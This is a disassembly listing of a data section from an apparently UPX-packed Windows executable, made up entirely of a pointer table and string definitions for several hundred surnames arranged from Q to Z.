dd offset aQuaday ; "Quaday"
dd offset aQuetin ; "Quetin"
dd offset aRabe ; "Rabe"
dd offset aRabkin ; "Rabkin"
dd offset aRadeke ; "Radeke"
dd offset aRajagopalan ; "Rajagopalan"
dd offset aRaney ; "Raney"
dd offset aRangan ; "Rangan"
dd offset aRankin ; "Rankin"
dd offset aRapple ; "Rapple"
dd offset aRayport ; "Rayport"
dd offset aReddenTyler ; "Redden-Tyler"
dd offset aReedquist ; "Reedquist"
dd offset aCunningham ; "Cunningham"
dd offset aReinold ; "Reinold"
dd offset aRemak ; "Remak"
dd offset aRenick ; "Renick"
dd offset aRepetto ; "Repetto"
dd offset aResnik ; "Resnik"
dd offset aRhea ; "Rhea"
dd offset aRichmond ; "Richmond"
dd offset aRielly ; "Rielly"
dd offset aRindos ; "Rindos"
dd offset aRineer ; "Rineer"
dd offset aRish ; "Rish"
dd offset aRivera ; "Rivera"
dd offset aRobinson ; "Robinson"
dd offset aRocha ; "Rocha"
dd offset aRoesler ; "Roesler"
dd offset aRogers ; "Rogers"
dd offset aRonen ; "Ronen"
dd offset aRow ; "Row"
dd offset aRoyal ; "Royal"
dd offset aRu ; "Ru"
dd offset aRuan ; "Ruan"
dd offset aRuderman ; "Ruderman"
dd offset aRuescher ; "Ruescher"
dd offset aRush ; "Rush"
dd offset aRyu ; "Ryu"
dd offset aSabatello ; "Sabatello"
dd offset aSadler ; "Sadler"
dd offset aSafire ; "Safire"
dd offset aSahu ; "Sahu"
dd offset aSali ; "Sali"
dd offset aSamson ; "Samson"
dd offset aSanchezRamirez ; "Sanchez-Ramirez"
dd offset aSanna ; "Sanna"
dd offset aSapers ; "Sapers"
dd offset aSarin ; "Sarin"
dd offset aSartore ; "Sartore"
dd offset aSase ; "Sase"
dd offset aSatin ; "Satin"
dd offset aSatta ; "Satta"
dd offset aSatterthwaite ; "Satterthwaite"
dd offset aSawtell ; "Sawtell"
dd offset aSayied ; "Sayied"
dd offset aScarponi ; "Scarponi"
dd offset aScepan ; "Scepan"
dd offset aScharf ; "Scharf"
dd offset aScharlemann ; "Scharlemann"
dd offset aScheiner ; "Scheiner"
dd offset aSchiano ; "Schiano"
dd offset aSchifini ; "Schifini"
dd offset aSchilling ; "Schilling"
dd offset aSchmitt ; "Schmitt"
dd offset aSchossberger ; "Schossberger"
dd offset aSchuman ; "Schuman"
dd offset aSchutte ; "Schutte"
dd offset aSchuyler ; "Schuyler"
dd offset aSchwan ; "Schwan"
dd offset aSchwickrath ; "Schwickrath"
dd offset aScovel ; "Scovel"
dd offset aScudder ; "Scudder"
dd offset aSeaton ; "Seaton"
dd offset aSeeber ; "Seeber"
dd offset aSegal ; "Segal"
dd offset aSekler ; "Sekler"
dd offset aSelvage ; "Selvage"
dd offset aSen ; "Sen"
dd offset aSennett ; "Sennett"
dd offset aSeterdahl ; "Seterdahl"
dd offset aSexton ; "Sexton"
dd offset aSeyfert ; "Seyfert"
dd offset aShaikh ; "Shaikh"
dd offset aShakis ; "Shakis"
dd offset aShankland ; "Shankland"
dd offset aShanley ; "Shanley"
dd offset aShar ; "Shar"
dd offset aShatrov ; "Shatrov"
dd offset aShavelson ; "Shavelson"
dd offset aShea ; "Shea"
dd offset aSheats ; "Sheats"
dd offset aShepherd ; "Shepherd"
dd offset aSheppard ; "Sheppard"
dd offset aShepstone ; "Shepstone"
dd offset aShesko ; "Shesko"
dd offset aShia ; "Shia"
dd offset aShibata ; "Shibata"
dd offset aShimon ; "Shimon"
dd offset aSiesto ; "Siesto"
dd offset aSigalot ; "Sigalot"
dd offset aSigini ; "Sigini"
dd offset aSigna ; "Signa"
dd offset aSilverman ; "Silverman"
dd offset aSilvetti ; "Silvetti"
dd offset aSinsabaugh ; "Sinsabaugh"
dd offset aSirilli ; "Sirilli"
dd offset aSites ; "Sites"
dd offset aSkane ; "Skane"
dd offset aSkerry ; "Skerry"
dd offset aSkoda ; "Skoda"
dd offset aSloan ; "Sloan"
dd offset aSlowe ; "Slowe"
dd offset aSmilow ; "Smilow"
dd offset aSniffen ; "Sniffen"
dd offset aSnodgrass ; "Snodgrass"
dd offset aSocolow ; "Socolow"
dd offset aSolon ; "Solon"
dd offset aSomers ; "Somers"
dd offset aSommariva ; "Sommariva"
dd offset aSorabella ; "Sorabella"
dd offset aSorg ; "Sorg"
dd offset aSottak ; "Sottak"
dd offset aSoukup ; "Soukup"
dd offset aSoule ; "Soule"
dd offset aSoultanian ; "Soultanian"
dd offset aSpanier ; "Spanier"
dd offset aSparrow ; "Sparrow"
dd offset aSpaulding ; "Spaulding"
dd offset aSpeizer ; "Speizer"
dd offset aSpence ; "Spence"
dd offset aSperber ; "Sperber"
dd offset aSpicer ; "Spicer"
dd offset aSpiegelhalter ; "Spiegelhalter"
dd offset aSpiliotis ; "Spiliotis"
dd offset aSpinrad ; "Spinrad"
dd offset aStmartin ; "StMartin"
dd offset aStalvey ; "Stalvey"
dd offset aStam ; "Stam"
dd offset aStang ; "Stang"
dd offset aStassinopolus ; "Stassinopolus"
dd offset aStates ; "States"
dd offset aStatlender ; "Statlender"
dd offset aStefani ; "Stefani"
dd offset aSteiner ; "Steiner"
dd offset aStephanian ; "Stephanian"
dd offset aStepniewska ; "Stepniewska"
dd offset aStewartOaten ; "Stewart-Oaten"
dd offset aStiepock ; "Stiepock"
dd offset aStillwell ; "Stillwell"
dd offset aStock ; "Stock"
dd offset aStockton ; "Stockton"
dd offset aStockwell ; "Stockwell"
dd offset aStolzenberg ; "Stolzenberg"
dd offset aStonich ; "Stonich"
dd offset aStorer ; "Storer"
dd offset aStott ; "Stott"
dd offset aStrange ; "Strange"
dd offset aStrauch ; "Strauch"
dd offset aStreiff ; "Streiff"
dd offset aStringer ; "Stringer"
dd offset aSullivan ; "Sullivan"
dd offset aSumner ; "Sumner"
dd offset aSuo ; "Suo"
dd offset aSurdam ; "Surdam"
dd offset aSweeting ; "Sweeting"
dd offset aSweetser ; "Sweetser"
dd offset aSwindle ; "Swindle"
dd offset aTagiuri ; "Tagiuri"
dd offset aTai ; "Tai"
dd offset aTalaugon ; "Talaugon"
dd offset aTambiah ; "Tambiah"
dd offset aTandler ; "Tandler"
dd offset aTanowitz ; "Tanowitz"
dd offset aTatar ; "Tatar"
dd offset aTaveras ; "Taveras"
dd offset aTawn ; "Tawn"
dd offset aTcherepnin ; "Tcherepnin"
dd offset aTeague ; "Teague"
dd offset aTemes ; "Temes"
dd offset aTemmer ; "Temmer"
dd offset aTenney ; "Tenney"
dd offset aTerracini ; "Terracini"
dd offset aThan ; "Than"
dd offset aThavaneswaran ; "Thavaneswaran"
dd offset aTheodos ; "Theodos"
dd offset aThibault ; "Thibault"
dd offset aThisted ; "Thisted"
dd offset aThomsen ; "Thomsen"
dd offset aThroop ; "Throop"
dd offset aTierney ; "Tierney"
dd offset aTill ; "Till"
dd offset aTimmons ; "Timmons"
dd offset aTofallis ; "Tofallis"
dd offset aTollestrup ; "Tollestrup"
dd offset aTolls ; "Tolls"
dd offset aTolman ; "Tolman"
dd offset aTomford ; "Tomford"
dd offset aToomer ; "Toomer"
dd offset aTopulos ; "Topulos"
dd offset aTorresi ; "Torresi"
dd offset aTorske ; "Torske"
dd offset aTowler ; "Towler"
dd offset aToye ; "Toye"
dd offset aTraebert ; "Traebert"
dd offset aTrenga ; "Trenga"
dd offset aTrewin ; "Trewin"
dd offset aTringali ; "Tringali"
dd offset aTroiani ; "Troiani"
dd offset aTroy ; "Troy"
dd offset aTruss ; "Truss"
dd offset aTsiatis ; "Tsiatis"
dd offset aTsomides ; "Tsomides"
dd offset aTsukurov ; "Tsukurov"
dd offset aTuck ; "Tuck"
dd offset aTudge ; "Tudge"
dd offset aTukan ; "Tukan"
dd offset aTurano ; "Turano"
dd offset aTurek ; "Turek"
dd offset aTuttle ; "Tuttle"
dd offset aTwells ; "Twells"
dd offset aTzamarias ; "Tzamarias"
dd offset aUllman ; "Ullman"
dd offset aUntermeyer ; "Untermeyer"
dd offset aUpsdell ; "Upsdell"
dd offset aUrban ; "Urban"
dd offset aUrdangBrown ; "Urdang-Brown"
dd offset aUsdan ; "Usdan"
dd offset aUzuner ; "Uzuner"
dd offset aVacca ; "Vacca"
dd offset aWaite ; "Waite"
dd offset aValberg ; "Valberg"
dd offset aValencia ; "Valencia"
dd offset aWales ; "Wales"
dd offset aWallenberg ; "Wallenberg"
dd offset aWalter ; "Walter"
dd offset aVanallen ; "vanAllen"
dd offset aVanzwet ; "VanZwet"
dd offset aVandenberg ; "Vandenberg"
dd offset aVanheeckeren ; "Vanheeckeren"
dd offset aWarshafsky ; "Warshafsky"
dd offset aWasowska ; "Wasowska"
dd offset aVasquez ; "Vasquez"
dd offset aWaugh ; "Waugh"
dd offset aWeighart ; "Weighart"
dd offset aWeingarten ; "Weingarten"
dd offset aWeinhaus ; "Weinhaus"
dd offset aWeissbourd ; "Weissbourd"
dd offset aWeissman ; "Weissman"
dd offset aVelasquez ; "Velasquez"
dd offset aWelles ; "Welles"
dd offset aWelsh ; "Welsh"
dd offset aWengret ; "Wengret"
dd offset aVenne ; "Venne"
dd offset aVerghese ; "Verghese"
dd offset aWescott ; "Wescott"
dd offset aWetzel ; "Wetzel"
dd offset aWhately ; "Whately"
dd offset aWhilton ; "Whilton"
dd offset aWhite ; "White"
dd offset aWhitla ; "Whitla"
dd offset aWhittaker ; "Whittaker"
dd offset aViana ; "Viana"
dd offset aViano ; "Viano"
dd offset aWiedersheim ; "Wiedersheim"
dd offset aWiener ; "Wiener"
dd offset aViens ; "Viens"
dd offset aVignola ; "Vignola"
dd offset aWilder ; "Wilder"
dd offset aWilhelm ; "Wilhelm"
dd offset aWilk ; "Wilk"
dd offset aWilkin ; "Wilkin"
dd offset aWilkinson ; "Wilkinson"
dd offset aVillarreal ; "Villarreal"
dd offset aWillstatter ; "Willstatter"
dd offset aWilson ; "Wilson"
dd offset aVitali ; "Vitali"
dd offset aViviani ; "Viviani"
dd offset aVoigt ; "Voigt"
dd offset aWolk ; "Wolk"
dd offset aVonhoffman ; "VonHoffman"
dd offset aWoo ; "Woo"
dd offset aWooden ; "Wooden"
dd offset aWoods ; "Woods"
dd offset aWoodsPowell ; "Woods-Powell"
dd offset aVorhaus ; "Vorhaus"
dd offset aVotey ; "Votey"
dd offset aYacono ; "Yacono"
dd offset aYamane ; "Yamane"
dd offset aYankee ; "Yankee"
dd offset aYarchuk ; "Yarchuk"
dd offset aYates ; "Yates"
dd offset aYbarra ; "Ybarra"
dd offset aYedidia ; "Yedidia"
dd offset aYesson ; "Yesson"
dd offset aYetiv ; "Yetiv"
dd offset aYoffe ; "Yoffe"
dd offset aYoo ; "Yoo"
dd offset aYoukSee ; "Youk-See"
dd offset aYu ; "Yu"
dd offset aZachary ; "Zachary"
dd offset aZahedi ; "Zahedi"
dd offset aZangwill ; "Zangwill"
dd offset aZegans ; "Zegans"
dd offset aZerbini ; "Zerbini"
dd offset aZoldak ; "Zoldak"
dd offset aZucconi ; "Zucconi"
dd offset aZurn ; "Zurn"
dd offset aZwiers ; "Zwiers"
dd offset aZytowski ; "Zytowski"
aZytowski db 'Zytowski',0 ; DATA XREF: UPX0:0042EF28�o
align 4
aZwiers db 'Zwiers',0 ; DATA XREF: UPX0:0042EF24�o
align 10h
aZurn db 'Zurn',0 ; DATA XREF: UPX0:0042EF20�o
align 4
aZucconi db 'Zucconi',0 ; DATA XREF: UPX0:0042EF1C�o
aZoldak db 'Zoldak',0 ; DATA XREF: UPX0:0042EF18�o
align 4
aZerbini db 'Zerbini',0 ; DATA XREF: UPX0:0042EF14�o
aZegans db 'Zegans',0 ; DATA XREF: UPX0:0042EF10�o
align 4
aZangwill db 'Zangwill',0 ; DATA XREF: UPX0:0042EF0C�o
align 4
aZahedi db 'Zahedi',0 ; DATA XREF: UPX0:0042EF08�o
align 4
aZachary db 'Zachary',0 ; DATA XREF: UPX0:0042EF04�o
aYu db 'Yu',0 ; DATA XREF: UPX0:0042EF00�o
align 4
aYoukSee db 'Youk-See',0 ; DATA XREF: UPX0:0042EEFC�o
align 4
aYoo db 'Yoo',0 ; DATA XREF: UPX0:0042EEF8�o
aYoffe db 'Yoffe',0 ; DATA XREF: UPX0:0042EEF4�o
align 10h
aYetiv db 'Yetiv',0 ; DATA XREF: UPX0:0042EEF0�o
align 4
aYesson db 'Yesson',0 ; DATA XREF: UPX0:0042EEEC�o
align 10h
aYedidia db 'Yedidia',0 ; DATA XREF: UPX0:0042EEE8�o
aYbarra db 'Ybarra',0 ; DATA XREF: UPX0:0042EEE4�o
align 10h
aYates db 'Yates',0 ; DATA XREF: UPX0:0042EEE0�o
align 4
aYarchuk db 'Yarchuk',0 ; DATA XREF: UPX0:0042EEDC�o
aYankee db 'Yankee',0 ; DATA XREF: UPX0:0042EED8�o
align 4
aYamane db 'Yamane',0 ; DATA XREF: UPX0:0042EED4�o
align 10h
aYacono db 'Yacono',0 ; DATA XREF: UPX0:0042EED0�o
align 4
aVotey db 'Votey',0 ; DATA XREF: UPX0:0042EECC�o
align 10h
aVorhaus db 'Vorhaus',0 ; DATA XREF: UPX0:0042EEC8�o
aWoodsPowell db 'Woods-Powell',0 ; DATA XREF: UPX0:0042EEC4�o
align 4
aWoods db 'Woods',0 ; DATA XREF: UPX0:0042EEC0�o
align 10h
aWooden db 'Wooden',0 ; DATA XREF: UPX0:0042EEBC�o
align 4
aWoo db 'Woo',0 ; DATA XREF: UPX0:0042EEB8�o
aVonhoffman db 'VonHoffman',0 ; DATA XREF: UPX0:0042EEB4�o
align 4
aWolk db 'Wolk',0 ; DATA XREF: UPX0:0042EEB0�o
align 10h
aVoigt db 'Voigt',0 ; DATA XREF: UPX0:0042EEAC�o
align 4
aViviani db 'Viviani',0 ; DATA XREF: UPX0:0042EEA8�o
aVitali db 'Vitali',0 ; DATA XREF: UPX0:0042EEA4�o
align 4
aWilson db 'Wilson',0 ; DATA XREF: UPX0:0042EEA0�o
align 10h
aWillstatter db 'Willstatter',0 ; DATA XREF: UPX0:0042EE9C�o
aVillarreal db 'Villarreal',0 ; DATA XREF: UPX0:0042EE98�o
align 4
aWilkinson db 'Wilkinson',0 ; DATA XREF: UPX0:0042EE94�o
align 4
aWilkin db 'Wilkin',0 ; DATA XREF: UPX0:0042EE90�o
align 4
aWilk db 'Wilk',0 ; DATA XREF: UPX0:0042EE8C�o
align 4
aWilhelm db 'Wilhelm',0 ; DATA XREF: UPX0:0042EE88�o
aWilder db 'Wilder',0 ; DATA XREF: UPX0:0042EE84�o
align 4
aVignola db 'Vignola',0 ; DATA XREF: UPX0:0042EE80�o
aViens db 'Viens',0 ; DATA XREF: UPX0:0042EE7C�o
align 4
aWiener db 'Wiener',0 ; DATA XREF: UPX0:0042EE78�o
align 4
aWiedersheim db 'Wiedersheim',0 ; DATA XREF: UPX0:0042EE74�o
aViano db 'Viano',0 ; DATA XREF: UPX0:0042EE70�o
align 10h
aViana db 'Viana',0 ; DATA XREF: UPX0:0042EE6C�o
align 4
aWhittaker db 'Whittaker',0 ; DATA XREF: UPX0:0042EE68�o
align 4
aWhitla db 'Whitla',0 ; DATA XREF: UPX0:0042EE64�o
align 4
aWhite db 'White',0 ; DATA XREF: UPX0:0042EE60�o
align 4
aWhilton db 'Whilton',0 ; DATA XREF: UPX0:0042EE5C�o
aWhately db 'Whately',0 ; DATA XREF: UPX0:0042EE58�o
aWetzel db 'Wetzel',0 ; DATA XREF: UPX0:0042EE54�o
align 4
aWescott db 'Wescott',0 ; DATA XREF: UPX0:0042EE50�o
aVerghese db 'Verghese',0 ; DATA XREF: UPX0:0042EE4C�o
align 10h
aVenne db 'Venne',0 ; DATA XREF: UPX0:0042EE48�o
align 4
aWengret db 'Wengret',0 ; DATA XREF: UPX0:0042EE44�o
aWelsh db 'Welsh',0 ; DATA XREF: UPX0:0042EE40�o
align 4
aWelles db 'Welles',0 ; DATA XREF: UPX0:0042EE3C�o
align 10h
aVelasquez db 'Velasquez',0 ; DATA XREF: UPX0:0042EE38�o
align 4
aWeissman db 'Weissman',0 ; DATA XREF: UPX0:0042EE34�o
align 4
aWeissbourd db 'Weissbourd',0 ; DATA XREF: UPX0:0042EE30�o
align 4
aWeinhaus db 'Weinhaus',0 ; DATA XREF: UPX0:0042EE2C�o
align 10h
aWeingarten db 'Weingarten',0 ; DATA XREF: UPX0:0042EE28�o
align 4
aWeighart db 'Weighart',0 ; DATA XREF: UPX0:0042EE24�o
align 4
aWaugh db 'Waugh',0 ; DATA XREF: UPX0:0042EE20�o
align 10h
aVasquez db 'Vasquez',0 ; DATA XREF: UPX0:0042EE1C�o
aWasowska db 'Wasowska',0 ; DATA XREF: UPX0:0042EE18�o
align 4
aWarshafsky db 'Warshafsky',0 ; DATA XREF: UPX0:0042EE14�o
align 10h
aVanheeckeren db 'Vanheeckeren',0 ; DATA XREF: UPX0:0042EE10�o
align 10h
aVandenberg db 'Vandenberg',0 ; DATA XREF: UPX0:0042EE0C�o
align 4
aVanzwet db 'VanZwet',0 ; DATA XREF: UPX0:0042EE08�o
aVanallen db 'vanAllen',0 ; DATA XREF: UPX0:0042EE04�o
align 10h
aWalter db 'Walter',0 ; DATA XREF: UPX0:0042EE00�o
align 4
aWallenberg db 'Wallenberg',0 ; DATA XREF: UPX0:0042EDFC�o
align 4
aWales db 'Wales',0 ; DATA XREF: UPX0:0042EDF8�o
align 4
aValencia db 'Valencia',0 ; DATA XREF: UPX0:0042EDF4�o
align 4
aValberg db 'Valberg',0 ; DATA XREF: UPX0:0042EDF0�o
aWaite db 'Waite',0 ; DATA XREF: UPX0:0042EDEC�o
align 4
aVacca db 'Vacca',0 ; DATA XREF: UPX0:0042EDE8�o
align 10h
aUzuner db 'Uzuner',0 ; DATA XREF: UPX0:0042EDE4�o
align 4
aUsdan db 'Usdan',0 ; DATA XREF: UPX0:0042EDE0�o
align 10h
aUrdangBrown db 'Urdang-Brown',0 ; DATA XREF: UPX0:0042EDDC�o
align 10h
aUrban db 'Urban',0 ; DATA XREF: UPX0:0042EDD8�o
align 4
aUpsdell db 'Upsdell',0 ; DATA XREF: UPX0:0042EDD4�o
aUntermeyer db 'Untermeyer',0 ; DATA XREF: UPX0:0042EDD0�o
align 4
aUllman db 'Ullman',0 ; DATA XREF: UPX0:0042EDCC�o
align 4
aTzamarias db 'Tzamarias',0 ; DATA XREF: UPX0:0042EDC8�o
align 10h
aTwells db 'Twells',0 ; DATA XREF: UPX0:0042EDC4�o
align 4
aTuttle db 'Tuttle',0 ; DATA XREF: UPX0:0042EDC0�o
align 10h
aTurek db 'Turek',0 ; DATA XREF: UPX0:0042EDBC�o
align 4
aTurano db 'Turano',0 ; DATA XREF: UPX0:0042EDB8�o
align 10h
aTukan db 'Tukan',0 ; DATA XREF: UPX0:0042EDB4�o
align 4
aTudge db 'Tudge',0 ; DATA XREF: UPX0:0042EDB0�o
align 10h
aTuck db 'Tuck',0 ; DATA XREF: UPX0:0042EDAC�o
align 4
aTsukurov db 'Tsukurov',0 ; DATA XREF: UPX0:0042EDA8�o
align 4
aTsomides db 'Tsomides',0 ; DATA XREF: UPX0:0042EDA4�o
align 10h
aTsiatis db 'Tsiatis',0 ; DATA XREF: UPX0:0042EDA0�o
aTruss db 'Truss',0 ; DATA XREF: UPX0:0042ED9C�o
align 10h
aTroy db 'Troy',0 ; DATA XREF: UPX0:0042ED98�o
align 4
aTroiani db 'Troiani',0 ; DATA XREF: UPX0:0042ED94�o
aTringali db 'Tringali',0 ; DATA XREF: UPX0:0042ED90�o
align 4
aTrewin db 'Trewin',0 ; DATA XREF: UPX0:0042ED8C�o
align 4
aTrenga db 'Trenga',0 ; DATA XREF: UPX0:0042ED88�o
align 4
aTraebert db 'Traebert',0 ; DATA XREF: UPX0:0042ED84�o
align 4
aToye db 'Toye',0 ; DATA XREF: UPX0:0042ED80�o
align 10h
aTowler db 'Towler',0 ; DATA XREF: UPX0:0042ED7C�o
align 4
aTorske db 'Torske',0 ; DATA XREF: UPX0:0042ED78�o
align 10h
aTorresi db 'Torresi',0 ; DATA XREF: UPX0:0042ED74�o
aTopulos db 'Topulos',0 ; DATA XREF: UPX0:0042ED70�o
aToomer db 'Toomer',0 ; DATA XREF: UPX0:0042ED6C�o
align 4
aTomford db 'Tomford',0 ; DATA XREF: UPX0:0042ED68�o
aTolman db 'Tolman',0 ; DATA XREF: UPX0:0042ED64�o
align 4
aTolls db 'Tolls',0 ; DATA XREF: UPX0:0042ED60�o
align 10h
aTollestrup db 'Tollestrup',0 ; DATA XREF: UPX0:0042ED5C�o
align 4
aTofallis db 'Tofallis',0 ; DATA XREF: UPX0:0042ED58�o
align 4
aTimmons db 'Timmons',0 ; DATA XREF: UPX0:0042ED54�o
aTill db 'Till',0 ; DATA XREF: UPX0:0042ED50�o
align 4
aTierney db 'Tierney',0 ; DATA XREF: UPX0:0042ED4C�o
aThroop db 'Throop',0 ; DATA XREF: UPX0:0042ED48�o
align 4
aThomsen db 'Thomsen',0 ; DATA XREF: UPX0:0042ED44�o
aThisted db 'Thisted',0 ; DATA XREF: UPX0:0042ED40�o
aThibault db 'Thibault',0 ; DATA XREF: UPX0:0042ED3C�o
align 4
aTheodos db 'Theodos',0 ; DATA XREF: UPX0:0042ED38�o
aThavaneswaran db 'Thavaneswaran',0 ; DATA XREF: UPX0:0042ED34�o
align 4
aThan db 'Than',0 ; DATA XREF: UPX0:0042ED30�o
align 4
aTerracini db 'Terracini',0 ; DATA XREF: UPX0:0042ED2C�o
align 10h
aTenney db 'Tenney',0 ; DATA XREF: UPX0:0042ED28�o
align 4
aTemmer db 'Temmer',0 ; DATA XREF: UPX0:0042ED24�o
align 10h
aTemes db 'Temes',0 ; DATA XREF: UPX0:0042ED20�o
align 4
aTeague db 'Teague',0 ; DATA XREF: UPX0:0042ED1C�o
align 10h
aTcherepnin db 'Tcherepnin',0 ; DATA XREF: UPX0:0042ED18�o
align 4
aTawn db 'Tawn',0 ; DATA XREF: UPX0:0042ED14�o
align 4
aTaveras db 'Taveras',0 ; DATA XREF: UPX0:0042ED10�o
aTatar db 'Tatar',0 ; DATA XREF: UPX0:0042ED0C�o
align 4
aTanowitz db 'Tanowitz',0 ; DATA XREF: UPX0:0042ED08�o
align 10h
aTandler db 'Tandler',0 ; DATA XREF: UPX0:0042ED04�o
aTambiah db 'Tambiah',0 ; DATA XREF: UPX0:0042ED00�o
aTalaugon db 'Talaugon',0 ; DATA XREF: UPX0:0042ECFC�o
align 4
aTai db 'Tai',0 ; DATA XREF: UPX0:0042ECF8�o
aTagiuri db 'Tagiuri',0 ; DATA XREF: UPX0:0042ECF4�o
aSwindle db 'Swindle',0 ; DATA XREF: UPX0:0042ECF0�o
aSweetser db 'Sweetser',0 ; DATA XREF: UPX0:0042ECEC�o
align 4
aSweeting db 'Sweeting',0 ; DATA XREF: UPX0:0042ECE8�o
align 4
aSurdam db 'Surdam',0 ; DATA XREF: UPX0:0042ECE4�o
align 10h
aSuo db 'Suo',0 ; DATA XREF: UPX0:0042ECE0�o
aSumner db 'Sumner',0 ; DATA XREF: UPX0:0042ECDC�o
align 4
aSullivan db 'Sullivan',0 ; DATA XREF: UPX0:0042ECD8�o
align 4
aStringer db 'Stringer',0 ; DATA XREF: UPX0:0042ECD4�o
align 4
aStreiff db 'Streiff',0 ; DATA XREF: UPX0:0042ECD0�o
aStrauch db 'Strauch',0 ; DATA XREF: UPX0:0042ECCC�o
aStrange db 'Strange',0 ; DATA XREF: UPX0:0042ECC8�o
aStott db 'Stott',0 ; DATA XREF: UPX0:0042ECC4�o
align 4
aStorer db 'Storer',0 ; DATA XREF: UPX0:0042ECC0�o
align 4
aStonich db 'Stonich',0 ; DATA XREF: UPX0:0042ECBC�o
aStolzenberg db 'Stolzenberg',0 ; DATA XREF: UPX0:0042ECB8�o
aStockwell db 'Stockwell',0 ; DATA XREF: UPX0:0042ECB4�o
align 4
aStockton db 'Stockton',0 ; DATA XREF: UPX0:0042ECB0�o
align 4
aStock db 'Stock',0 ; DATA XREF: UPX0:0042ECAC�o
align 10h
aStillwell db 'Stillwell',0 ; DATA XREF: UPX0:0042ECA8�o
align 4
aStiepock db 'Stiepock',0 ; DATA XREF: UPX0:0042ECA4�o
align 4
aStewartOaten db 'Stewart-Oaten',0 ; DATA XREF: UPX0:0042ECA0�o
align 4
aStepniewska db 'Stepniewska',0 ; DATA XREF: UPX0:0042EC9C�o
aStephanian db 'Stephanian',0 ; DATA XREF: UPX0:0042EC98�o
align 10h
aSteiner db 'Steiner',0 ; DATA XREF: UPX0:0042EC94�o
aStefani db 'Stefani',0 ; DATA XREF: UPX0:0042EC90�o
aStatlender db 'Statlender',0 ; DATA XREF: UPX0:0042EC8C�o
align 4
aStates db 'States',0 ; DATA XREF: UPX0:0042EC88�o
align 4
aStassinopolus db 'Stassinopolus',0 ; DATA XREF: UPX0:0042EC84�o
align 4
aStang db 'Stang',0 ; DATA XREF: UPX0:0042EC80�o
align 4
aStam db 'Stam',0 ; DATA XREF: UPX0:0042EC7C�o
align 4
aStalvey db 'Stalvey',0 ; DATA XREF: UPX0:0042EC78�o
aStmartin db 'StMartin',0 ; DATA XREF: UPX0:0042EC74�o
align 4
aSpinrad db 'Spinrad',0 ; DATA XREF: UPX0:0042EC70�o
aSpiliotis db 'Spiliotis',0 ; DATA XREF: UPX0:0042EC6C�o
align 4
aSpiegelhalter db 'Spiegelhalter',0 ; DATA XREF: UPX0:0042EC68�o
align 4
aSpicer db 'Spicer',0 ; DATA XREF: UPX0:0042EC64�o
align 4
aSperber db 'Sperber',0 ; DATA XREF: UPX0:0042EC60�o
aSpence db 'Spence',0 ; DATA XREF: UPX0:0042EC5C�o
align 4
aSpeizer db 'Speizer',0 ; DATA XREF: UPX0:0042EC58�o
aSpaulding db 'Spaulding',0 ; DATA XREF: UPX0:0042EC54�o
align 4
aSparrow db 'Sparrow',0 ; DATA XREF: UPX0:0042EC50�o
aSpanier db 'Spanier',0 ; DATA XREF: UPX0:0042EC4C�o
aSoultanian db 'Soultanian',0 ; DATA XREF: UPX0:0042EC48�o
align 4
aSoule db 'Soule',0 ; DATA XREF: UPX0:0042EC44�o
align 4
aSoukup db 'Soukup',0 ; DATA XREF: UPX0:0042EC40�o
align 4
aSottak db 'Sottak',0 ; DATA XREF: UPX0:0042EC3C�o
align 4
aSorg db 'Sorg',0 ; DATA XREF: UPX0:0042EC38�o
align 4
aSorabella db 'Sorabella',0 ; DATA XREF: UPX0:0042EC34�o
align 10h
aSommariva db 'Sommariva',0 ; DATA XREF: UPX0:0042EC30�o
align 4
aSomers db 'Somers',0 ; DATA XREF: UPX0:0042EC2C�o
align 4
aSolon db 'Solon',0 ; DATA XREF: UPX0:0042EC28�o
align 4
aSocolow db 'Socolow',0 ; DATA XREF: UPX0:0042EC24�o
aSnodgrass db 'Snodgrass',0 ; DATA XREF: UPX0:0042EC20�o
align 10h
aSniffen db 'Sniffen',0 ; DATA XREF: UPX0:0042EC1C�o
aSmilow db 'Smilow',0 ; DATA XREF: UPX0:0042EC18�o
align 10h
aSlowe db 'Slowe',0 ; DATA XREF: UPX0:0042EC14�o
align 4
aSloan db 'Sloan',0 ; DATA XREF: UPX0:0042EC10�o
align 10h
aSkoda db 'Skoda',0 ; DATA XREF: UPX0:0042EC0C�o
align 4
aSkerry db 'Skerry',0 ; DATA XREF: UPX0:0042EC08�o
align 10h
aSkane db 'Skane',0 ; DATA XREF: UPX0:0042EC04�o
align 4
aSites db 'Sites',0 ; DATA XREF: UPX0:0042EC00�o
align 10h
aSirilli db 'Sirilli',0 ; DATA XREF: UPX0:0042EBFC�o
aSinsabaugh db 'Sinsabaugh',0 ; DATA XREF: UPX0:0042EBF8�o
align 4
aSilvetti db 'Silvetti',0 ; DATA XREF: UPX0:0042EBF4�o
align 10h
aSilverman db 'Silverman',0 ; DATA XREF: UPX0:0042EBF0�o
align 4
aSigna db 'Signa',0 ; DATA XREF: UPX0:0042EBEC�o
align 4
aSigini db 'Sigini',0 ; DATA XREF: UPX0:0042EBE8�o
align 4
aSigalot db 'Sigalot',0 ; DATA XREF: UPX0:0042EBE4�o
aSiesto db 'Siesto',0 ; DATA XREF: UPX0:0042EBE0�o
align 4
aShimon db 'Shimon',0 ; DATA XREF: UPX0:0042EBDC�o
align 4
aShibata db 'Shibata',0 ; DATA XREF: UPX0:0042EBD8�o
aShia db 'Shia',0 ; DATA XREF: UPX0:0042EBD4�o
align 4
aShesko db 'Shesko',0 ; DATA XREF: UPX0:0042EBD0�o
align 4
aShepstone db 'Shepstone',0 ; DATA XREF: UPX0:0042EBCC�o
align 4
aSheppard db 'Sheppard',0 ; DATA XREF: UPX0:0042EBC8�o
align 4
aShepherd db 'Shepherd',0 ; DATA XREF: UPX0:0042EBC4�o
align 10h
aSheats db 'Sheats',0 ; DATA XREF: UPX0:0042EBC0�o
align 4
aShea db 'Shea',0 ; DATA XREF: UPX0:0042EBBC�o
align 10h
aShavelson db 'Shavelson',0 ; DATA XREF: UPX0:0042EBB8�o
align 4
aShatrov db 'Shatrov',0 ; DATA XREF: UPX0:0042EBB4�o
aShar db 'Shar',0 ; DATA XREF: UPX0:0042EBB0�o
align 4
aShanley db 'Shanley',0 ; DATA XREF: UPX0:0042EBAC�o
aShankland db 'Shankland',0 ; DATA XREF: UPX0:0042EBA8�o
align 10h
aShakis db 'Shakis',0 ; DATA XREF: UPX0:0042EBA4�o
align 4
aShaikh db 'Shaikh',0 ; DATA XREF: UPX0:0042EBA0�o
align 10h
aSeyfert db 'Seyfert',0 ; DATA XREF: UPX0:0042EB9C�o
aSexton db 'Sexton',0 ; DATA XREF: UPX0:0042EB98�o
align 10h
aSeterdahl db 'Seterdahl',0 ; DATA XREF: UPX0:0042EB94�o
align 4
